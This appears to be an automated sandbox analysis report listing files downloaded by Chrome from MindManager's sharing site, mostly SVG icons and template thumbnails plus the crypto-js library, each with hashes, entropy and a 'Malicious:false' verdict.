                                                                SHA-256:7A41F3E2E383F422F4FC4BECCD341E7306BEF7F3119B4EC6C31335DA7918FF66
                                                                SHA-512:9D6463406530BD21B6958236FBC7AF789CBF6DC807C8B698090B911AEA9FE0090EF3D0F865BC8DFE82A6567AB2AE348C28E29EAB9BBEC70A51F0EA050205F7B3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/Dependencies/TaskAutomationStartToStart.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 15.99 15.5"><defs><style>.cls-1{fill:#ecf4fa;}.cls-2,.cls-4{fill:none;stroke-miterlimit:10;}.cls-2{stroke:#3283c0;}.cls-3{fill:#3283c0;}.cls-4{stroke:#a20400;}.cls-5{fill:#a20400;}</style></defs><title>dependency S2S</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" x="1.99" y="1" width="13" height="6"/><rect class="cls-2" x="2.49" y="0.5" width="13" height="6"/><line class="cls-2" x1="1.99" y1="3.5" x2="11.84" y2="3.5"/><polygon class="cls-3" points="11.4 5 13.99 3.5 11.4 2 11.4 5"/><rect class="cls-1" x="1.99" y="9" width="13" height="6"/><rect class="cls-2" x="2.49" y="8.5" width="13" height="6"/><line class="cls-2" x1="1.99" y1="11.5" x2="11.84" y2="11.5"/><polygon class="cls-3" points="11.4 13 13.99 11.5 11.4 10 11.4 13"/><line class="cls-4" x1="2.49" x2="2.49" y2="11.91"/><polygon class="cls-5" points="0 11.18 2.49 15.5 4.99 11.18 0 11.18"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):71276
                                                                Entropy (8bit):4.135073275655437
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:597D7231563430BCC33F1F8919401FE9
                                                                SHA1:FD7C7C9FDEBDE86E4D9C22B72563A8DD2804D705
                                                                SHA-256:488B383BBF7A059D056B4861DCB9454C89360CCF4746B59F5DBEEF87A2C47AB9
                                                                SHA-512:C4A2A69B5F29CAC723591580A57EA318A29421C57F8A51935035E874DFBF03B677241ED4C5B92595B2EFAA685A1E5086F4322B6188793CD156EEFE79E48086BD
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/banners/banner_mindmapping.svg
                                                                Preview:<svg width="650" height="180" viewBox="0 0 650 180" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_458_5427)">..<path d="M0 40.8984C0 35.3756 4.47715 30.8984 10 30.8984H640C645.523 30.8984 650 35.3756 650 40.8984V170.898C650 176.421 645.523 180.898 640 180.898H10C4.47715 180.898 0 176.421 0 170.898V40.8984Z" fill="#FFDAC3"/>..<path d="M445.385 35.3367C433.323 51.6681 431.542 73.2539 438.557 91.8313C445.571 110.409 460.717 125.994 478.965 136.696C502.766 150.656 533.267 156.625 560.257 148.69C587.247 140.754 609.006 117.385 608.752 91.7935C608.631 79.4944 603.137 61.0072 591.013 55.3613C579.328 49.9199 566.451 50.5205 554.668 45.2536C533.556 35.8165 532.399 15.013 507.14 10.199C487.097 6.37969 455.998 20.9672 445.385 35.3367Z" fill="#F6C2A2"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M453.165 36.9477C452.139 36.9477 451.156 37.355 450.431 38.0801C449.706 38.8051 449.298 39.7886 449.298 40.814V48.4705C449.298 48.7743 449.052 49.0205 448.748 49.0205C448
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):42008
                                                                Entropy (8bit):4.202597770422418
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C8689DC9317AC87F3D109096FDD46B66
                                                                SHA1:A76D8F651920D46D4344A6629BB88F80BD6CB881
                                                                SHA-256:FE4341F0919FFF8B6217A987CAE402576CD71CE52C48DD163781C14057D8C655
                                                                SHA-512:4224C0BCAAE61557ED828F8F033C9CCF215369B3662E36D6B0ED353C3BD55166D1F9E9A05448D820A5354B4F4F2D3C1F9B2A217C3B3CCC7AD21F428163309E61
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/banners/banner_personal.svg
                                                                Preview:<svg width="650" height="180" viewBox="0 0 650 180" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_8037)">..<path d="M0 40.8984C0 35.3756 4.47715 30.8984 10 30.8984H640C645.523 30.8984 650 35.3756 650 40.8984V170.898C650 176.421 645.523 180.898 640 180.898H10C4.47715 180.898 0 176.421 0 170.898V40.8984Z" fill="#CCEBEA"/>..<path d="M524.072 10.7126C537.331 10.4498 550.699 7.43025 563.734 9.86747C587.553 14.3208 605.648 39.119 602.621 63.1608C599.594 87.2026 575.917 106.742 551.738 105.152C543.928 104.638 535.914 102.246 528.443 104.58C518.487 107.691 512.377 118.344 502.481 121.643C489.079 126.111 472.04 114.897 461.724 107.224C451.083 99.3102 438.74 87.5002 433.82 74.8429C428.743 61.7844 429.653 44.4835 433.455 31.2289C436.863 19.3486 445.431 9.33676 456.862 4.51994C470.794 -1.35174 482.166 3.04598 495.745 6.96758C504.946 9.63022 514.495 10.8927 524.072 10.7126Z" fill="#9CE0DE"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M581.481 14.1272C566.317 1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):457
                                                                Entropy (8bit):5.246414867317093
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:DED232640C44370E34345C3C32E824E9
                                                                SHA1:C54545B1DB8D455622D1D56A6A1F3528A3B12DD0
                                                                SHA-256:C71EDE0EEAD0FB732F5C2D091228635FFA1C8E6097AA7CC8EF9D655F4ECE772E
                                                                SHA-512:E2393B0D63C101B3CC21E8AE741DAAEF2107D1187F45282D4B31C34DD59EAD232FDD5D64EBE7A020889378AD31292228328C8A61169E233F9BE42A2D4305C3C9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/no-entry.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#f03637;}.cls-3{fill:none;stroke:#f03637;stroke-miterlimit:10;stroke-width:2px;}</style></defs><title>signs_9_16</title><circle class="cls-1" cx="8" cy="8" r="7"/><path class="cls-2" d="M8,2A6,6,0,1,1,2,8,6,6,0,0,1,8,2M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><line class="cls-3" x1="2.25" y1="2.25" x2="13.5" y2="13.5"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):823
                                                                Entropy (8bit):4.997601562126307
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D4E852F271413DF1B7C21C78064F78BD
                                                                SHA1:9843EAE3ABB457A2A0ADD7A6D3EF3668BC8BF808
                                                                SHA-256:D1FFA04CDB08C3519D47ACB76536213F16BF65E2F6528A08865F995F1EC60B1A
                                                                SHA-512:37F632FA4BCDD79D2E3D46A72083CAB6BF8326C1234C981AAEAB0194FFC1197C4B81DEF0F5E9104C8BBBB147F958C08F9949A36195AC3BC6BEFEF3A761C34AF5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/percentageDone06.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#2a6bac;}.cls-3{fill:#4197ff;}.cls-4{fill:#2979cd;}</style></defs><title>percentageDone06</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><path class="cls-3" d="M9,15.5a6.23,6.23,0,0,1-4.61-2.09L8.79,8.5H9.5v-8a6.34,6.34,0,0,1,4.19,2.14,8.05,8.05,0,0,1,1.94,6.23A7.21,7.21,0,0,1,10,15.42a7,7,0,0,1-1,.08Z"/><path class="cls-4" d="M10,1.09A5.91,5.91,0,0,1,13.32,3a7.54,7.54,0,0,1,1.82,5.84,6.71,6.71,0,0,1-5.21,6.08A5.84,5.84,0,0,1,9,15a5.67,5.67,0,0,1-3.93-1.61L9,9h1V1.09M9,0V8H8.57L3.72,13.41A6.84,6.84,0,0,0,9,16a6.77,6.77,0,0,0,1.09-.09,7.69,7.69,0,0,0,6-7C16.63,4.1,13.24,0,9,0Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1247
                                                                Entropy (8bit):5.240025787009543
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FA23DCBF0A1A4A4FFF498A109D337DC2
                                                                SHA1:2C8BFA34E42D091B02C35ECC80D299151D58D5F1
                                                                SHA-256:F673C4205582A543619D5AD93CAA74AEAEF68CC141A1FF71160E41090EE1DE1D
                                                                SHA-512:C5B01E1B4AD798E142B13BDB13774BF75C6970EDAA4A951E79FB82F53B35ABA4C152760C73D97CBBD54767492D92E35431DDD729FFFE14ACE7FE8A148D3877B6
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_format_painter.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 22.45 24.07"><defs><style>.cls-1{fill:#efc46f;}.cls-1,.cls-4{stroke:#b5863a;}.cls-1,.cls-3,.cls-4,.cls-5{stroke-miterlimit:10;}.cls-2,.cls-5{fill:gray;}.cls-3{fill:#e6e6e6;stroke:gray;}.cls-4{fill:none;}.cls-5{stroke:#fff;}</style></defs><title>web app toolbar assets format painter</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_2-2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M3.78,7.81,1.66,9.93a4,4,0,0,0-.6,4.85l3.43-3.44c-1.95,1.95-2.21,4.86-.57,6.5l5.52,5.52,5-4.95Z"/><ellipse class="cls-2" cx="11.95" cy="10.5" rx="3.65" ry="5.21" transform="translate(-3.93 11.52) rotate(-45)"/><path class="cls-3" d="M5.71,9h11a2,2,0,0,1,2,2v2a0,0,0,0,1,0,0h-15a0,0,0,0,1,0,0V11a2,2,0,0,1,2-2Z" transform="translate(11.05 -4.71) rotate(45)"/><rect class="cls-2" x="13.8" y="4.39" width="4" height="4" transform="translate(9.15 -9.3) rotate(45)"/><ellipse class="cls-2" cx="18.95" cy="3.5" rx="3.66" ry="3.3
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):387
                                                                Entropy (8bit):5.28994794138553
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A3E350AF251D49173E033F283A3A83EE
                                                                SHA1:745F17241B1EF72DD9358DC78919A7DD424DD030
                                                                SHA-256:3A986A74013A8EB7A0662ED727735A734595B9494403E91C4B737748EBC4C275
                                                                SHA-512:09E496A935E08476B52B76C64E73756A9C38413853B6F05612E9D07F8164FFF039ED3CE5416073654911F7E074A8A2A50EE9E3C60B555194057606AC364FEFB1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/objects/isosceles-triangle.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 14"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}</style></defs><title>background_shape_Asset 68</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><polygon class="cls-1" points="0.86 13.5 8 1.01 15.14 13.5 0.86 13.5"/><path class="cls-2" d="M8,2l6.28,11H1.72L8,2M8,0,0,14H16L8,0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2864
                                                                Entropy (8bit):4.909512932072701
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2A2280281DE4CBDA6747C81AE82E0CCD
                                                                SHA1:2CCB353E3D2718C9C17A04C552CB6DEC47FA865E
                                                                SHA-256:67C40196818ED8940404D4A2598C977F5D730E94C357571170FE16364AE6C016
                                                                SHA-512:2A9872D658D81BF0C5B10943F1D83B3A90071BEC9658DC85FD93DF121C14BF6FCB57EA2B9A8053E2C9ED187CADF1420A1C8B8367C8EC90FA9A3792728D255246
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/matrixorganization.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<line x1="48.9668" y1="48.4742" x2="37.6443" y2="48.4742" stroke="#FFDBC8" stroke-width="0.8"/>.<line x1="48.9668" y1="65.1402" x2="37.6443" y2="65.1402" stroke="#FFDBC8" stroke-width="0.8"/>.<line x1="48.9668" y1="81.8043" x2="37.6443" y2="81.8043" stroke="#FFDBC8" stroke-width="0.8"/>.<line x1="49.3668" y1="34.3496" x2="49.3668" y2="86.3061" stroke="#405F8C" stroke-width="0.8"/>.<line x1="76.5406" y1="34.3496" x2="76.5406" y2="86.3061" stroke="#405F8C" stroke-width="0.8"/>.<line x1="104.847" y1="34.3496" x2="104.847" y2="86.3061" stroke="#405F8C" stroke-width="0.8"/>.<line x1="132.02" y1="34.3496" x2="132.02" y2="86.3061" stroke="#405F8C" stroke-width="0.8"/>.<rect x="48.9668" y="23.5664" width="22.6449" height="11.7637" rx="1" fill="#FFC7A3"/>.<rect x="48.9668" y="42.1914" width="22.6449" height="11.7637" rx="1" fill="#CBDEF4"/>.<rect x="15" y="42.1914" width="22.6449" height="11.7637"
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1554
                                                                Entropy (8bit):4.880655938599275
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:255DB7DEDA23C286D4B5179F08DFB10D
                                                                SHA1:38314FAC767BB5C1623E46DD4E78BB7AE17777B3
                                                                SHA-256:94692BA834560E0419771D496A692C950F3D7B8F16C725B896F323715D21EEE6
                                                                SHA-512:2C13E5C67340D431FAB1521846060A4020DC05EBA3AFB1F43D2E659B0E986EB99EE71FF6A0FD1EEAA220C3B6B17B80D96302E7A154491B800A9E1CA107D17538
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/studynotes.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="50" y="64.7285" width="69.2222" height="25.2716" rx="2" fill="#E2EEEF"/>.<rect x="50" width="23.0741" height="62.6296" rx="2" fill="#FCF5E9"/>.<rect x="75.2715" width="43.9506" height="62.6296" rx="2" fill="#F1F1F4"/>.<rect opacity="0.2" x="53.2959" y="8.78906" width="15.3827" height="2.19753" fill="#F58358"/>.<rect opacity="0.2" x="80.7656" y="8.78906" width="32.9629" height="2.19753" fill="#53535B"/>.<rect opacity="0.2" x="53.2959" y="15.3828" width="15.3827" height="2.19753" fill="#F58358"/>.<rect opacity="0.2" x="80.7656" y="15.3828" width="32.9629" height="2.19753" fill="#53535B"/>.<rect opacity="0.2" x="53.2959" y="21.9746" width="15.3827" height="2.19753" fill="#F58358"/>.<rect opacity="0.2" x="54.3945" y="72.5176" width="60.4321" height="2.19753" fill="#409CA5"/>.<rect opacity="0.2" x="80.7656" y="21.9746" width="32.9629" height="2.19753" fill="#53535B"/>.<rect opacity="0.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):48316
                                                                Entropy (8bit):5.6346993394709
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):611
                                                                Entropy (8bit):5.1884910902406585
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0716AB1D3D35586F86892910F0295CDD
                                                                SHA1:ADF7BD657CAD0F9EC1F67E85D54B1C1905937592
                                                                SHA-256:41019B90ED90778EF6BEAC07570B3C3C02D51AB59E566B570E01EFF46A6AD073
                                                                SHA-512:F6302F42C4B6B40ADB4BF897929181B8CAFA9263435CA551EA4314D87E0129332ED9CA5B8740B6251B9C0BA73AE0CA7A6143D544EF7675C1D85511CBC2AAFAF5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/priority01.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#e10001;}.cls-2{fill:#9e0008;}.cls-3{fill:#fff;}</style></defs><title>priority01</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="0.5" ry="0.5"/><path class="cls-2" d="M15,1V15H1V1H15m0-1H1A1,1,0,0,0,0,1V15a1,1,0,0,0,1,1H15a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1Z"/><path class="cls-2" d="M6,13V11H8V6.73L8.25,6h0a2.6,2.6,0,0,1-.39.49L7.22,7,5.81,5.52,8.51,3H10v8h2v2Z"/><path class="cls-3" d="M5,12V10H7V5.73L7.25,5h0a2.6,2.6,0,0,1-.39.49L6.22,6,4.81,4.52,7.51,2H9v8h2v2Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 51 x 48, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):516
                                                                Entropy (8bit):7.305251784910468
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0A483BB9D361522967DF40B8A419F736
                                                                SHA1:A6F8E57333671E44D281903A9A9AB81210A7A90B
                                                                SHA-256:3C90F5D4B2CF999E091C03A51ACB89CF417E1DB3DD175B5794A32C8443065D5A
                                                                SHA-512:B94DF7AB73F82BF33165EBC388CD0C9A262B75D36F5C92BAE17450EC9800084557DD1F62D49C49736F250BDE5A94B3C84B07D5809AF897699A7C067486D5869E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-align-left.png
                                                                Preview:.PNG........IHDR...3...0......5B.....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<....IDATx..=r.0..e.>.t......<....r............]JR..%...,.hlp&Ev.}3.k...Y...O..A.y..en.i_...+......oF.j(.S.4."[#[.(.Xh..R....0.@Xl.NPA.]8...:...+h...C..(......m.4L.........._.@.... ...9.j.(.`.Y@y.2,f..{a...yr....r.1c{a(..B`..n....(K...9.JM...0...`("p..kY.j.........C..6.<.A3..&eY.Y.}^g....$....|...Q. .z...........IY..Z.>..@a.Fa:`.n6].....W..9.....'...N...&.%...<..s..0.......i.?.k..-....`..=....$....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1966
                                                                Entropy (8bit):4.283493020165636
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6A295722A62F308EDD7A90363B28C55A
                                                                SHA1:F6128B740163E224F2F2DB367DA00EF29A5EA040
                                                                SHA-256:401E7CD6A60165A783584499AA48849D557021C0D37FE7B3BD5120CCAD37F61D
                                                                SHA-512:6265F556E479D94F5128612A59735A06DE8D9E6E04F3090C66622675ACFBA27D33FCCE86537ADF869D5241C5C4150E5675B289FC2FFC369AB04830DB31CA04F3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/remote-services/mm-file-storage.svg
                                                                Preview:<svg width="33" height="33" viewBox="0 0 33 33" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M9.60498 26.2733L16.4673 11.5137H16.9281L20.7934 19.7779C19.2703 20.4166 18.0901 21.7106 17.6052 23.3072C17.3158 23.2801 17.022 23.2662 16.7244 23.2662C13.9117 23.2662 11.4252 24.5099 9.92518 26.4106C9.92475 26.4106 9.92453 26.4108 9.92432 26.411C9.9241 26.4112 9.92388 26.4114 9.92345 26.4114L9.60498 26.2733Z" fill="#84DDDA"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M22.2773 1.58081H29.8904C30.3038 1.58081 30.6387 1.91484 30.6387 2.32829V23.0236C29.8115 22.314 28.7689 21.9634 27.683 21.9562C26.6935 20.3874 24.945 19.3452 22.9531 19.3452C22.0939 19.3452 21.2801 19.5391 20.5528 19.8855L16.7338 11.5129L21.781 1.88118C21.8777 1.69647 22.0693 1.58081 22.2773 1.58081ZM16.7338 11.5129L9.93538 26.3986C9.93193 26.4029 9.92847 26.4064 9.92416 26.4107L9.9233 26.4116H7.57057H3.57628C3.16373 26.4116 2.82886 26.0775 2.82886 25.6641V2.32829C2.82886
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows icon resource - 3 icons, -128x-128, 8 bits/pixel, 32x32, 8 bits/pixel
                                                                Category:downloaded
                                                                Size (bytes):23150
                                                                Entropy (8bit):3.9849851954748137
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:84EED8D2B63D52F47854F67E03CB8E20
                                                                SHA1:74D59FE15A0EAD2445A6AB2546E8D0C2EA650D06
                                                                SHA-256:2B1181F3E1AECD7736532898B8626E92F0F2BE25F8EC32E3E04BBE9347BE443B
                                                                SHA-512:231D9BADF0B9D582931D8E58BE19854A70285574AA2E812CCD8FCADFA21BDBCD4FA6190756997B32B052E093D2248BFF9DC7DD9A54F112A9B64F39EEDAEA5500
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/ico/business-data.ico
                                                                Preview:..............(L..6... ..........^L..........h....U..(....................H..................cB-..iS.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2527
                                                                Entropy (8bit):5.035691361683894
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:379F0DCA878869E6F090F2B1E3707AC6
                                                                SHA1:5B1DFEADF405A487F506DCAC9CDEC7C2631A7E4D
                                                                SHA-256:24573A198B9C38E3CD2BB00545792A240FD6EE370A91B5506C1A93F5F1C618BA
                                                                SHA-512:12E23D2272F3FBDC88D5D3F5F27387204F7DACAF8769C895453A88A5928CE809A1F337FF98B53BB646426007802BC91BB7883F8E90C4C1570BBA8305829B5294
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/timeline.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="10.0957" y="6.04688" width="36.6781" height="82.7877" rx="2" fill="#FEE3EB"/>.<rect x="46.4238" y="6.39648" width="36.6781" height="82.4384" rx="2" fill="#FFF7E4"/>.<rect x="83.4531" y="6.39648" width="36.6781" height="82.4384" rx="2" fill="#E3F3FE"/>.<rect x="120.131" y="6.39648" width="36.6781" height="82.4384" rx="2" fill="#DBE9CA"/>.<g opacity="0.4">.<path d="M17.7812 9.19141V45.5202" stroke="#F9C2D2" stroke-width="0.3" stroke-dasharray="0.3 0.3"/>.<rect x="15.6855" y="23.166" width="12.5753" height="6.9863" rx="3" fill="#F291AC"/>.<rect x="15.6855" y="32.9434" width="12.5753" height="2.79452" rx="1" fill="#F291AC"/>.<rect x="15.6855" y="38.5312" width="12.5753" height="2.79452" rx="1" fill="#F291AC"/>.<rect x="15.6855" y="44.123" width="12.5753" height="2.79452" rx="1" fill="#F291AC"/>.</g>.<g opacity="0.4">.<path d="M56.9082 9.19141V45.5202" stroke="#F7C060" stroke-width="0.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):3307
                                                                Entropy (8bit):4.829876422659926
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:AA3BFC26A1154EE38059981F57784EE1
                                                                SHA1:C3B6ACED31908598ECD93B4E27FE449DE9CA4252
                                                                SHA-256:87686B37484D1DC9BB40E9CC61EE3734AF0B504FC52EE754844D376FDD27E92C
                                                                SHA-512:3A99616EA292CDF85CF22C9CBE1D133771E2015D8D8F3A6D1C03018D30FC5C19B33DA4C4ACF61C3C3C9B812FCA50DECEBF609D6AFBB180C0FF66E9D753C1ABB2
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/affinitydiagram.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="13" y="3" width="143.653" height="13.3913" rx="1" fill="#FBF3FC"/>.<rect x="13" y="17.6074" width="47.4784" height="15.8261" rx="1" fill="#E8F5FF"/>.<rect x="61.6953" y="17.6074" width="47.4784" height="15.8261" rx="1" fill="#E8F5FF"/>.<rect x="110.392" y="17.6074" width="46.261" height="15.8261" rx="1" fill="#E8F5FF"/>.<rect x="13" y="34.6523" width="23.1305" height="15.8261" rx="1" fill="#E5FEE8"/>.<rect x="37.3477" y="34.6523" width="23.1305" height="15.8261" rx="1" fill="#E5FEE8"/>.<rect x="61.6953" y="34.6523" width="23.1305" height="15.8261" rx="1" fill="#E5FEE8"/>.<rect x="86.043" y="34.6523" width="23.1305" height="15.8261" rx="1" fill="#E5FEE8"/>.<rect x="110.392" y="34.6523" width="23.1305" height="15.8261" rx="1" fill="#E5FEE8"/>.<rect x="134.739" y="34.6523" width="21.9131" height="15.8261" rx="1" fill="#E5FEE8"/>.<rect x="13" y="51.6953" width="23.1305" height="35.304
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:dropped
                                                                Size (bytes):497
                                                                Entropy (8bit):4.684891921463926
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B57C99C9D1E3C50B2114C6DB053D7FF0
                                                                SHA1:ADA8ABFED92BA8A545BBD9D299D74D5972CC4AE8
                                                                SHA-256:691DCDB24853A0F5CE4E6597E5713DEA66799B57FFE2C2A10F28F98E0B569B19
                                                                SHA-512:0DAB6D06F386D922FB28F70F2590D4F9C361E7F4E5D5E581B98E59AAC12B266CBA596FFCCD87203B4330673EE4EC1D459A1ABDFC4B066D243A43B2BF7909F0EE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg"><path class="ot-floating-button__svg-fill" d="M14.588 0l.445.328c1.807 1.303 3.961 2.533 6.461 3.688 2.015.93 4.576 1.746 7.682 2.446 0 14.178-4.73 24.133-14.19 29.864l-.398.236C4.863 30.87 0 20.837 0 6.462c3.107-.7 5.668-1.516 7.682-2.446 2.709-1.251 5.01-2.59 6.906-4.016zm5.87 13.88a.75.75 0 00-.974.159l-5.475 6.625-3.005-2.997-.077-.067a.75.75 0 00-.983 1.13l4.172 4.16 6.525-7.895.06-.083a.75.75 0 00-.16-.973z" fill="#FFF" fill-rule="evenodd"/></svg>
